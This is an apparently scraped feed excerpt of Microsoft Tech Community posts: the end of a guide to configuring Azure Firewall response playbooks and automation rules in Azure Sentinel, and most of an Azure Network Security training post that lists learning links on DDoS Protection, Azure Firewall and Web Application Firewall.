to authorize the APIs:</FONT> <OL class="lia-list-style-type-lower-alpha"> <LI><FONT size="4">Click an API to open the API Connection settings page</FONT></LI> <LI><FONT size="4">Click the <STRONG>Edit API Connection </STRONG>node in the left pane</FONT></LI> <LI><FONT size="4">Click the Authorize button in the blade, sign in, and click <STRONG>Save</STRONG> to authorize the API</FONT></LI> <LI><FONT size="4">Repeat steps a, b &amp; c for all twelve APIs in the same manner, one at a time</FONT> <OL class="lia-list-style-type-lower-roman"> <LI><FONT size="4">To authorize the three VirusTotal APIs, you will need to add the API key in the <STRONG>x-api_key</STRONG> field and click <STRONG>Save</STRONG></FONT></LI> <LI><FONT size="4">To authorize the three Teams APIs, you will need to sign in with the same identity you use to log on to Teams</FONT></LI> </OL> </LI> </OL> </LI> </OL> <P>&nbsp;</P> <OL start="2"> <LI><FONT size="4">Validate/update playbook configuration:&nbsp; Validate or optionally update the playbook configuration to ensure that all components are set up correctly and ready to be used.&nbsp; Please complete the following steps to validate/update the configuration of the playbooks:</FONT> <OL class="lia-list-style-type-lower-alpha"> <LI><FONT size="4">Click on one of the playbooks to open Settings</FONT></LI> <LI><FONT size="4">Click on the <STRONG>Logic app designer </STRONG>in the <STRONG>Development tools </STRONG>node</FONT></LI> <LI><FONT size="4">Check that all steps show up without the exclamation icon, which indicates an issue with the configuration</FONT></LI> </OL> </LI> </OL> <P class="lia-indent-padding-left-90px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="PlaybookConnections.png" style="width: 364px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/286114i69C92A4BCB9E3C5E/image-size/large?v=v2&amp;px=999" role="button" title="PlaybookConnections.png" alt="Playbook Validation - 
error" /><span class="lia-inline-image-caption" onclick="event.preventDefault();">Playbook Validation - error</span></span></P> <OL start="2"> <LI style="list-style-type: none;"> <OL class="lia-list-style-type-lower-alpha"> <LI> <FONT size="4">Optionally, if you skipped adding the Teams Group and Channel ids during initial deployment by adding N/A (or some other text) to the fields, you can configure them now by opening <STRONG style="font-family: inherit;">Teams Connections</STRONG><SPAN style="font-family: inherit;"> under the </SPAN><STRONG style="font-family: inherit;">For each Malicious IP Address Entity present</STRONG><SPAN style="font-family: inherit;"> in the Incident step and then selecting the appropriate Teams Group and Channel using the drop-down selection</SPAN></FONT></LI> </OL> </LI> </OL> <P class="lia-indent-padding-left-90px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_2-1622749684665.png" style="width: 356px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/286109i031B837D0F1FF46E/image-dimensions/356x438?v=v2" width="356" height="438" role="button" title="Mohit_Kumar_2-1622749684665.png" alt="Playbook Validation - Configure Teams Settings" /><span class="lia-inline-image-caption" onclick="event.preventDefault();">Playbook Validation - Configure Teams Settings</span></span></P> <P>&nbsp;</P> <OL start="3"> <LI><FONT size="4">Configure playbook permissions:&nbsp; To allow Azure Sentinel to run Firewall playbooks based on a detection rule, you must give Azure Sentinel permission to run them.&nbsp; Please complete the following steps to add permissions:</FONT> <OL class="lia-list-style-type-lower-alpha"> <LI><FONT size="4">Open the Azure Sentinel blade and click 
<STRONG>Automation</STRONG> under the <STRONG>Configuration</STRONG> node</FONT></LI> <LI><FONT size="4">Click on <STRONG>Configure permissions</STRONG> button under <STRONG>Give Sentinel permissions to run playbooks</STRONG></FONT></LI> <LI><FONT size="4">In the <STRONG>Manage permissions</STRONG> blade, search for, and then click to select the resource group which contains the firewall playbooks</FONT></LI> <LI><FONT size="4">After selecting the appropriate resource group, click <STRONG>Apply</STRONG></FONT></LI> </OL> </LI> </OL> <P>&nbsp;</P> <P><FONT size="4">Congratulations!&nbsp; You are now ready to use the Azure Firewall playbooks with Azure Sentinel rules.</FONT></P> <H2>&nbsp;</H2> <P>&nbsp;</P> <P>&nbsp;</P> <H2><FONT size="6">Playbooks in Action</FONT></H2> <H2>&nbsp;</H2> <P><FONT size="4">To see how the playbooks and the connector work together, please use the following instructions:</FONT></P> <P>&nbsp;</P> <OL> <LI><FONT size="4">Open the Azure Sentinel blade and click <STRONG>Analytics </STRONG>under the <STRONG>Configuration </STRONG>node</FONT></LI> <LI><FONT size="4">Click on <STRONG>Rule templates </STRONG>tab and filter <STRONG>Data Sources </STRONG>to Azure Firewall.&nbsp; This will show all the <A href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/new-detections-for-azure-firewall-in-azure-sentinel/ba-p/2244958" target="_blank" rel="noopener">built-in Analytic Rule templates for Azure Firewall</A></FONT></LI> <LI><FONT size="4">Select one of the rules and create an Analytic Rule for Azure Firewall</FONT> <UL> <LI><FONT size="4">Alternately, you could also use a custom rule that you have created for testing</FONT> <UL> <LI><FONT size="4"><STRONG><EM>Note</EM></STRONG><EM>: The Analytic Rule must be one which generates alerts/creates incidents with an IP address (IP entity)</EM></FONT></LI> </UL> </LI> </UL> </LI> </OL> <OL start="4"> <LI><FONT size="4">Once the rule is created and active, click on the 
<STRONG>Automation</STRONG> node</FONT></LI> <LI><FONT size="4">In the Automation blade, click <STRONG>Create </STRONG><STRONG>→ Add new rule</STRONG></FONT></LI> <LI><FONT size="4">In the <STRONG>Create new automation rule </STRONG>blade, provide a name for your automation rule</FONT></LI> <LI><FONT size="4">Observe that the <STRONG>Trigger </STRONG>is preset to <EM>When incident is created</EM></FONT></LI> <LI><FONT size="4">Under <STRONG>Conditions</STRONG>, select <EM>If Analytic rule name</EM><STRONG> Contains </STRONG>&lt;name of the rule you created in step 3&gt;</FONT></LI> <LI><FONT size="4">Under <STRONG>Actions</STRONG>, select <STRONG>Run Playbook</STRONG> and then select one of the Firewall playbooks you have deployed</FONT></LI> <LI><FONT size="4">Add a <STRONG>Rule expiration </STRONG>date or time (default is indefinite) and a value for <STRONG>Order </STRONG>(the order in which the rule should be processed)</FONT></LI> <LI><FONT size="4">Click <STRONG>Apply </STRONG>to enable the rule</FONT></LI> </OL> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="CreateAnalyticandAutomationRules3.gif" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/286203iA66AA639C71922CB/image-size/large?v=v2&amp;px=999" role="button" title="CreateAnalyticandAutomationRules3.gif" alt="Creating Sentinel Analytic and Automation Rules" /><span class="lia-inline-image-caption" onclick="event.preventDefault();">Creating Sentinel Analytic and Automation Rules</span></span></P> <P>&nbsp;</P> <P><FONT size="4">With the Automation rule created and enabled, Azure Sentinel will trigger the playbook attached to the Automation rule whenever the condition defined in the Analytic Rule is met.&nbsp; This will send you an adaptive notification card in the Teams Channel you have specified in the configuration.&nbsp; You can then click on the different options available 
in the Teams adaptive card to make changes to the target IP Groups, TI allow list or the Network Rule Collections.</FONT></P> <P>&nbsp;</P> <P><FONT size="4">For testing the playbook workflow, you could create a custom Analytic Rule and then generate the traffic to trigger the playbooks.</FONT></P> <H2>&nbsp;</H2> <P>&nbsp;</P> <P>&nbsp;</P> <H2><FONT size="6">Summary</FONT></H2> <H2>&nbsp;</H2> <P><FONT size="4">Azure Firewall logs can help identify patterns of malicious activity in your network.&nbsp; Azure Firewall Connector and Playbook templates can help expedite SOC triage with Teams notification and rapid mitigation with on-click response/remediation in case of threat detections.&nbsp; We encourage all customers to utilize these new automation capabilities to help improve your overall security posture.</FONT></P> <P>&nbsp;</P> <P><FONT size="4">You can also contribute new connectors, playbooks, detections, workbooks, analytics and more for Azure Firewall in Azure Sentinel. Get started now by joining the <A href="#" target="_blank" rel="noopener">Azure Network Security</A> plus <A href="#" target="_blank" rel="noopener">Azure Sentinel Threat Hunters</A> communities on GitHub and following the guidance.</FONT></P> <H2>&nbsp;</H2> <P>&nbsp;</P> <P>&nbsp;</P> <H2><FONT size="6"><SPAN>Additional Resources</SPAN></FONT></H2> <H2>&nbsp;</H2> <UL> <LI><FONT size="4">To learn more about Azure Firewall, visit:&nbsp; <A href="#" target="_blank" rel="noopener">https://aka.ms/AzNetSecNinja</A></FONT></LI> <LI><FONT size="4">To learn more about Azure Sentinel, visit:&nbsp; <A href="#" target="_blank" rel="noopener">http://aka.ms/ninjatraining</A></FONT></LI> <LI><FONT size="4">To learn more about Automation Rules and Playbooks, visit:</FONT> <UL class="lia-list-style-type-circle"> <LI><FONT size="4"><A href="#" target="_blank" rel="noopener">Automate incident handling in Azure Sentinel</A></FONT></LI> <LI><FONT size="4"><A href="#" target="_blank" rel="noopener">Automate 
threat response with playbooks in Azure Sentinel</A></FONT></LI> <LI><FONT size="4"><A href="#" target="_blank" rel="noopener">Tutorial: Use playbooks with automation rules in Azure Sentinel</A></FONT></LI> </UL> </LI> </UL> <P>&nbsp;</P> <P>&nbsp;</P> Thu, 03 Jun 2021 23:40:04 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/automated-detection-and-response-for-azure-firewall-with-the-new/ba-p/2414224 Mohit_Kumar 2021-06-03T23:40:04Z Azure Network Security Ninja Training https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/azure-network-security-ninja-training/ba-p/2356101 <P><STRONG>Last updated on October 6, 2021</STRONG></P> <P>&nbsp;</P> <P>In this blog post, we will walk you through basic to advanced scenarios for Azure network security. Ready to become an Azure NetSec ninja? Dive right in!</P> <P>&nbsp;</P> <P>Check back here routinely, as we will keep updating this blog post with new content as it becomes available.</P> <P>&nbsp;</P> <P>Anything in here that could be improved or may be missing? Let us know in the comments below, we’re looking forward to hearing from you.</P> <P>&nbsp;</P> <TABLE> <TBODY> <TR style="background-color: cee2fc;"> <TD style="text-align: center;"><SPAN style="font-size: x-large;"><STRONG>Highlight of the Month:&nbsp;<A href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/new-detections-hunting-queries-and-response-automation-in-azure/ba-p/2688746" target="_self">Azure Firewall Solution for Azure Sentinel: New Detections, Hunting Queries and Response Automation</A></STRONG></SPAN></TD> </TR> <TR style="background-color: e9ecf0;"> <TD style="background-color: e9ecf0;"> <P style="text-align: justify;">The Azure Firewall Solution provides new threat detections, hunting queries, a new firewall workbook and response automation as packaged content. 
This enables you to find the appropriate solution easily and then deploy all the components in the solution in a single step from the Solutions blade in Azure Sentinel.</P> </TD> </TR> </TBODY> </TABLE> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="NetSecNinjaTable.png" style="width: 931px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/280793i7050D6B0333E752D/image-size/large?v=v2&amp;px=999" role="button" title="NetSecNinjaTable.png" alt="Azure Network Security Ninja Training Sections" /><span class="lia-inline-image-caption" onclick="event.preventDefault();">Azure Network Security Ninja Training Sections</span></span></P> <H1>1&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; The Basics</H1> <P>&nbsp;</P> <H2><SPAN style="color: #000080;">1.1&nbsp;&nbsp;&nbsp;&nbsp; Introduction to network security concepts</SPAN></H2> <P>&nbsp;</P> <P>This module introduces general concepts of network and web application security.</P> <P>&nbsp;</P> <H3 style="padding-left: 30px;"><SPAN style="color: #3366ff;">1.1.1&nbsp;&nbsp;&nbsp; Network security in Azure</SPAN></H3> <P style="padding-left: 30px;">Be familiar with network security concepts and ways you can achieve a secure network deployment in the Azure cloud.</P> <UL> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Network security and containment in Azure</A></LI> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Secure and govern workloads with network level segmentation</A></LI> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Best practices for network security</A></LI> </UL> <P>&nbsp;</P> <H3 style="padding-left: 30px;"><SPAN style="color: #3366ff;">1.1.2&nbsp;&nbsp;&nbsp; Web application protection in Azure</SPAN></H3> <P style="padding-left: 30px;">Be familiar with web application protection concepts and ways you can achieve a secure web application deployment in the Azure 
cloud.</P> <UL> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Best practices for secure PaaS deployments</A></LI> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">N-tier architecture style</A></LI> </UL> <P style="padding-left: 30px;">&nbsp;</P> <H2><SPAN style="color: #000080;">1.2&nbsp;&nbsp;&nbsp;&nbsp; Introduction to Azure network security products</SPAN></H2> <P>&nbsp;</P> <BLOCKQUOTE> <P>Do you prefer videos? Check out the <A href="#" target="_blank" rel="noopener">Introduction to Azure Network Security</A> (50 minutes) webinar, which covers all products listed individually below. You can also quickly browse through the <A href="#" target="_blank" rel="noopener">contents of the presentation deck</A>.&nbsp;</P> </BLOCKQUOTE> <H3 style="padding-left: 30px;">&nbsp;</H3> <H3 style="padding-left: 30px;"><SPAN style="color: #3366ff;">1.2.1&nbsp;&nbsp;&nbsp; Azure DDoS Protection Standard</SPAN></H3> <P style="padding-left: 30px;">Azure DDoS Protection Standard, combined with application design best practices, provides enhanced DDoS mitigation features to defend against DDoS attacks.</P> <P style="padding-left: 30px;">&nbsp;</P> <BLOCKQUOTE> <P style="padding-left: 30px;">For more information, check the <A href="#" target="_blank" rel="noopener">Azure DDoS Protection Standard documentation</A>.</P> </BLOCKQUOTE> <P style="padding-left: 30px;"><STRONG>MS Learn Training Material:&nbsp;</STRONG><A href="#" target="_blank" rel="noopener">Azure DDoS Protection Standard</A> (35 minutes)</P> <P style="padding-left: 30px;">This MS Learn module will show you how to guard your Azure services from a denial-of-service attack using Azure DDoS Protection Standard.</P> <P>&nbsp;</P> <H3 style="padding-left: 30px;"><SPAN style="color: #3366ff;">1.2.2&nbsp;&nbsp;&nbsp; Azure Firewall and Azure Firewall Manager</SPAN></H3> <P style="padding-left: 30px;">Azure Firewall is a managed, cloud-based network security service that 
protects your Azure Virtual Network resources. It's a fully stateful firewall as a service with built-in high availability and unrestricted cloud scalability.</P> <P style="padding-left: 30px;">&nbsp;</P> <BLOCKQUOTE> <P style="padding-left: 30px;">For more information, check the <A href="#" target="_blank" rel="noopener">Azure Firewall documentation</A>.&nbsp;</P> </BLOCKQUOTE> <P style="padding-left: 30px;">&nbsp;</P> <P style="padding-left: 30px;">Azure Firewall Manager is a security management service that provides central security policy and route management for cloud-based security perimeters.</P> <P style="padding-left: 30px;">&nbsp;</P> <BLOCKQUOTE> <P style="padding-left: 30px;">For more information, check the <A href="#" target="_blank" rel="noopener">Azure Firewall Manager documentation</A>.</P> </BLOCKQUOTE> <P style="padding-left: 30px;"><STRONG>MS Learn Training Material:&nbsp;</STRONG><A href="#" target="_blank" rel="noopener">Azure Firewall and Azure Firewall Manager</A> (40 minutes)</P> <P style="padding-left: 30px;">This MS Learn module will describe how Azure Firewall protects Azure Virtual Network resources, including the Azure Firewall features, rules, deployment options, and administration with Azure Firewall Manager.</P> <P>&nbsp;</P> <H3 style="padding-left: 30px;"><SPAN style="color: #3366ff;">1.2.3&nbsp;&nbsp;&nbsp; Azure Web Application Firewall (WAF)</SPAN></H3> <P style="padding-left: 30px;">Web Application Firewall (WAF) provides centralized protection of your web applications from common exploits and vulnerabilities. 
You can deploy WAF on Azure Application Gateway or WAF on Azure Front Door.</P> <P style="padding-left: 30px;">&nbsp;</P> <BLOCKQUOTE> <P style="padding-left: 30px;">For more information, check the <A href="#" target="_blank" rel="noopener">Azure Web Application Firewall (WAF) documentation</A>.</P> </BLOCKQUOTE> <P style="padding-left: 30px;"><STRONG>MS Learn Training Material:&nbsp;</STRONG><A href="#" target="_blank" rel="noopener">Azure Web Application Firewall (WAF)</A> (40 minutes)</P> <P style="padding-left: 30px;">This MS Learn module will show how Azure Web Application Firewall protects Azure web applications from&nbsp;common&nbsp;attacks, including its features, how it’s deployed, and its common use cases.</P> <P style="padding-left: 30px;">&nbsp;</P> <H1>2&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Architecture and Deployments</H1> <P>&nbsp;</P> <H2><SPAN style="color: #000080;">2.1&nbsp;&nbsp;&nbsp;&nbsp; Standalone Deployments</SPAN></H2> <P>&nbsp;</P> <H3 style="padding-left: 30px;"><SPAN style="color: #3366ff;">2.1.1&nbsp;&nbsp;&nbsp; Azure DDoS Protection Standard</SPAN></H3> <P style="padding-left: 30px;">When deploying Azure DDoS Protection Standard, keep in mind that public IPs in ARM-based VNETs are currently the only type of protected resource. PaaS services (multitenant) are not supported for Azure DDoS Protection Standard SKU at this time. 
For these services, the default DDoS Protection Basic SKU applies.</P> <P style="padding-left: 30px;">The main steps to deploy Azure DDoS Protection Standard are:</P> <UL> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Create a DDoS protection plan</A></LI> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Attach vNETs to the DDoS protection plan</A></LI> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Configure DDoS logging</A></LI> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Enable diagnostic settings on Public IP Address resources</A></LI> </UL> <BLOCKQUOTE> <P>Do you prefer videos? Check out the <A href="#" target="_blank" rel="noopener">Getting started with Azure Distributed Denial of Service&nbsp;(DDoS) Protection</A> (60 minutes) webinar. You can also quickly browse through the <A href="#" target="_blank" rel="noopener">contents of the presentation deck.</A>&nbsp;&nbsp;&nbsp;</P> </BLOCKQUOTE> <H3 style="padding-left: 30px;">&nbsp;</H3> <H3 style="padding-left: 30px;"><SPAN style="color: #3366ff;">2.1.2&nbsp;&nbsp;&nbsp; Azure Firewall</SPAN></H3> <P style="padding-left: 30px;">You can choose to deploy Azure Firewall Standard SKU or Azure Firewall Premium SKU (currently in Public Preview). Check the documentation below to get an understanding of their feature differences:</P> <UL> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Azure Firewall Standard - Features</A></LI> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Azure Firewall Premium - Features</A></LI> </UL> <P style="padding-left: 30px;">During your planning stages, it’s also a good idea to refer to the known issues for these products. 
Being aware of these known issues will save you time and stress when deploying your Azure Firewall.</P> <UL> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Azure Firewall Standard - Known Issues</A></LI> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Azure Firewall Premium - Known Issues</A></LI> </UL> <P>&nbsp;</P> <P style="padding-left: 30px;"><STRONG>Deploy and configure Azure Firewall using the Azure portal </STRONG></P> <UL> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Deploy and configure Azure Firewall using the Azure portal</A></LI> </UL> <P style="padding-left: 30px;">&nbsp;</P> <P style="padding-left: 30px;"><STRONG>Azure Firewall logs and metrics </STRONG></P> <UL> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Azure Firewall logs and metrics</A></LI> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Monitor Azure Firewall logs and metrics</A></LI> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Overview of Azure Firewall logs and metrics</A></LI> </UL> <P style="padding-left: 30px;">&nbsp;</P> <P style="padding-left: 30px;"><STRONG>Integrate Azure Firewall with Azure Standard Load Balancer</STRONG></P> <UL> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Integrate Azure Firewall with Azure Standard Load Balancer</A></LI> </UL> <P style="padding-left: 30px;">&nbsp;</P> <P style="padding-left: 30px;"><STRONG>Use Azure Firewall to protect Azure Kubernetes Service (AKS) Deployments</STRONG></P> <UL> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Use Azure Firewall to protect Azure Kubernetes Service (AKS) Deployments</A></LI> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Restrict egress traffic in Azure Kubernetes Service (AKS)</A></LI> </UL> <P style="padding-left: 30px;">&nbsp;</P> <P style="padding-left: 
30px;"><STRONG>Azure Firewall DNS settings</STRONG></P> <UL> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Azure Firewall DNS settings</A></LI> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Enabling DNS proxy in your Azure Firewall will allow you to use FQDN filtering in network rules</A></LI> <LI style="padding-left: 30px;"><A href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/enabling-central-visibility-for-dns-using-azure-firewall-custom/ba-p/2156331" target="_blank" rel="noopener">Enabling Central Visibility For DNS Using Azure Firewall Custom DNS and DNS Proxy</A></LI> </UL> <P style="padding-left: 30px;">&nbsp;</P> <P style="padding-left: 30px;"><STRONG>Azure Firewall in forced tunneling mode</STRONG></P> <UL> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Azure Firewall in forced tunneling mode</A></LI> </UL> <BLOCKQUOTE> <P>Do you prefer videos? Check out the <A href="#" target="_blank" rel="noopener">Manage application and network connectivity with Azure Firewall</A> (50 minutes) webinar. You can also quickly browse through the <A href="#" target="_blank" rel="noopener">contents of the presentation deck.</A></P> <P>&nbsp;</P> <P data-unlink="true">You can also check out this&nbsp;<A href="#" target="_self">Azure Firewall Deep Dive</A>&nbsp;on Youtube (82 minutes). 
It covers almost everything you need to know!</P> </BLOCKQUOTE> <H3 style="padding-left: 30px;"><SPAN style="color: #3366ff;">2.1.3&nbsp;&nbsp;&nbsp; Azure Web Application Firewall (WAF)</SPAN></H3> <UL> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Create a WAF Policy on Azure Application Gateway</A></LI> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Create a WAF Policy on Azure Front Door</A></LI> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Configure WAF logging for an Application Gateway deployment</A></LI> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Configure WAF logging for a Front Door deployment</A></LI> <LI style="padding-left: 30px;"><A href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/azure-web-application-firewall-waf-config-versus-waf-policy/ba-p/2270525" target="_blank" rel="noopener">Azure Web Application Firewall: WAF config versus WAF policy</A></LI> </UL> <P>&nbsp;</P> <H2><SPAN style="color: #000080;">2.2&nbsp;&nbsp;&nbsp;&nbsp; Advanced Deployments</SPAN></H2> <P>&nbsp;</P> <H3 style="padding-left: 30px;"><SPAN style="color: #3366ff;">2.2.1&nbsp;&nbsp;&nbsp; On-Prem Hybrid</SPAN></H3> <UL> <LI style="padding-left: 30px;">Deploy and configure Azure Firewall in a hybrid network <A href="#" target="_blank" rel="noopener">via Azure Portal</A> or <A href="#" target="_blank" rel="noopener">via PowerShell</A></LI> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Deploy network virtual appliances (NVAs) for high availability in Azure</A></LI> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Implement a secure hybrid</A></LI> </UL> <P>&nbsp;</P> <H3 style="padding-left: 30px;"><SPAN style="color: #3366ff;">2.2.2&nbsp;&nbsp;&nbsp; vWAN (Secured Virtual Hub)</SPAN></H3> <UL> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Introduction to 
Azure Virtual WAN</A></LI> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">What are the Azure Firewall Manager architecture options?</A></LI> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Azure Virtual WAN FAQs</A></LI> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">How does the virtual hub in a virtual WAN select the best path for a route from multiple hubs?</A></LI> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Configure Azure Firewall in a VWAN hub</A></LI> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Convert a VWAN to a Secure Hub</A></LI> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Secure your VirtualHub with Azure Firewall Manager</A></LI> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Migrate to Virtual WAN</A></LI> </UL> <P>&nbsp;</P> <H3 style="padding-left: 30px;"><SPAN style="color: #3366ff;">2.2.3&nbsp;&nbsp;&nbsp; vWAN (Secured Virtual Hub) with 3<SUP>rd</SUP> party SECCaaS</SPAN></H3> <UL> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">VWAN hub partners</A></LI> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Deploy a security partner provider</A></LI> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Deploy Check Point CloudGuard Connect as a trusted Azure security partner</A></LI> </UL> <P>&nbsp;</P> <H3 style="padding-left: 30px;"><SPAN style="color: #3366ff;">2.2.4&nbsp;&nbsp;&nbsp; Hub and Spoke</SPAN></H3> <UL> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Hub and spoke network topology </A></LI> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Hub-spoke network topology with Azure Firewall </A></LI> <LI style="padding-left: 30px;"><A 
href="https://gorovian.000webhostapp.com/?exam=t5/fasttrack-for-azure/using-azure-firewall-as-a-network-virtual-appliance-nva/ba-p/1972934" target="_blank" rel="noopener">Using Azure Firewall as a Network Virtual Appliance (NVA)</A></LI> </UL> <P>&nbsp;</P> <H3 style="padding-left: 30px;"><SPAN style="color: #3366ff;">2.2.5&nbsp;&nbsp;&nbsp; Forced Tunneling with 3<SUP>rd</SUP> party NVAs</SPAN></H3> <UL> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Forced tunneling configuration.</A></LI> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Validated VPN devices</A></LI> </UL> <P>&nbsp;</P> <H3 style="padding-left: 30px;"><SPAN style="color: #3366ff;">2.2.6&nbsp;&nbsp;&nbsp; Multi-product combination in Azure</SPAN></H3> <UL> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Combine Azure Firewall with other Network security products.</A></LI> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Determine how best to combine App Gateway and Azure Frontdoor</A></LI> </UL> <P>&nbsp;</P> <H3 style="padding-left: 30px;"><SPAN style="color: #3366ff;">2.2.7&nbsp;&nbsp;&nbsp; TLS Inspection on Azure Firewall</SPAN></H3> <UL> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Enable TLS inspection in Azure firewall</A></LI> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Learn about URL filtering and Web Categories</A></LI> <LI style="padding-left: 30px;"><A href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/certificate-management-overview-for-azure-firewall-premium-tls/ba-p/2214763" target="_blank" rel="noopener">Certificate Management Overview for Azure Firewall Premium TLS Inspection</A></LI> </UL> <BLOCKQUOTE> <P>Do you prefer videos? Check out the <A href="#" target="_blank" rel="noopener">Content Inspection Using TLS Termination with Azure Firewall Premium</A> (50 minutes) webinar. 
You can also quickly browse through the <A href="#" target="_blank" rel="noopener">contents of the presentation deck.</A>&nbsp;</P> </BLOCKQUOTE> <H3 style="padding-left: 30px;">&nbsp;</H3> <H3 style="padding-left: 30px;"><SPAN style="color: #3366ff;">2.2.8&nbsp;&nbsp;&nbsp; Per-Site or Per-URI WAF policies on Azure Application Gateway</SPAN></H3> <UL> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Configure Per-Site WAF policies</A></LI> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Apply Per-URI policy</A></LI> </UL> <BLOCKQUOTE> <P>Do you prefer videos? Check out the <A href="#" target="_blank" rel="noopener">Using Azure WAF Policies to Protect Your Web Application at Different Association Levels</A> (50 minutes) webinar. You can also quickly browse through the <A href="#" target="_blank" rel="noopener">contents of the presentation deck.</A>&nbsp;</P> </BLOCKQUOTE> <H1>&nbsp;</H1> <H1>3&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Operations</H1> <P>&nbsp;</P> <H2><SPAN style="color: #000080;">3.1&nbsp;&nbsp;&nbsp;&nbsp; Centralized Management</SPAN></H2> <P>&nbsp;</P> <H3 style="padding-left: 30px;"><SPAN style="color: #3366ff;">3.1.1&nbsp;&nbsp;&nbsp; Azure Firewall Manager and Firewall Policy</SPAN></H3> <UL> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Use Azure Firewall policy to define a rule hierarchy</A></LI> </UL> <BLOCKQUOTE> <P>Do you prefer videos? Check out the <A href="#" target="_blank" rel="noopener">Getting started with Azure Firewall Manager</A> (35 minutes) webinar. 
You can also quickly browse through the <A href="#" target="_blank" rel="noopener">contents of the Azure Firewall Manager presentation deck</A>.&nbsp;</P> </BLOCKQUOTE> <H3 style="padding-left: 30px;">&nbsp;</H3> <H3 style="padding-left: 30px;"><SPAN style="color: #3366ff;">3.1.2&nbsp;&nbsp;&nbsp; Web Application Firewall (WAF) Policy</SPAN></H3> <UL> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Migrate from WAF Config to WAF Policy</A></LI> </UL> <P>&nbsp;</P> <H2><SPAN style="color: #000080;">3.2&nbsp;&nbsp;&nbsp;&nbsp; Optimizing</SPAN></H2> <P>&nbsp;</P> <H3 style="padding-left: 30px;"><SPAN style="color: #3366ff;">3.2.1&nbsp;&nbsp;&nbsp; Web Application Firewall (WAF) tuning</SPAN></H3> <UL> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Troubleshooting and tuning for Azure WAF for Application Gateway</A></LI> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Troubleshooting and tuning for Azure WAF for Front Door</A></LI> </UL> <BLOCKQUOTE> <P>Do you prefer videos? Check out the <A href="#" target="_blank" rel="noopener">Boosting your Azure Web Application (WAF) deployment</A> (45 minutes) webinar. 
